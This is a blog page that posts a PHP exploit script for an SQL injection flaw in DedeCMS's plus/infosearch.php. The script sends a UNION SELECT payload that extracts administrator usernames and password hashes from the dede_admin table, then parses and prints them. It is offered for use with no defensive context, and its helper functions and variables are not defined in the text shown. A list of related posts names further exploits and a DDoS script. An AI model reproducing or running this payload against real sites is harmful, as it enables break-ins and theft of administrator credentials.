Chinadu's Blog

<?
print_r('
--------------------------------------------------------------------------------
dedecms gpk "/plus/infosearch.php" SQL injection exploit
BY 冰的原点 (<a href="http://www.tools.net" target="_blank">http://www.tools.net</a>)
thx oldjun
--------------------------------------------------------------------------------
');

$packet ="GET ".$path."plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,concat(uname,0x3a,substring(pwd,9,16)),4,5,6%20from%20dede_admin/*# HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(":",$html))
{
echo $packet;
echo $html;
die("Exploit failed...");
}
else
{
$pattern="/\" class=\"title\">(.*?)<\/a>/si"; 
preg_match($pattern,$html,$pg);
$result=explode(":",$pg[1]);
print_r('
--------------------------------------------------------------------------------
[+]username -> '.$result[0].'
[+]password(16位md5) -> '.$result[1].'
--------------------------------------------------------------------------------
');
}
function is_hash($hash)
{
if (ereg("^[a-z0-9]{16}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($result[1])) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>


相关文章

• 2011年12月3日 -- PHP端口复用的利用
• 2011年12月3日 -- php open_basedir设置以及关于安全
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP
• 2011年04月30日 -- Linux下Apache与PHP安全相关设置
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年06月23日 -- 分享国外一个PHP DDOS的脚本
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)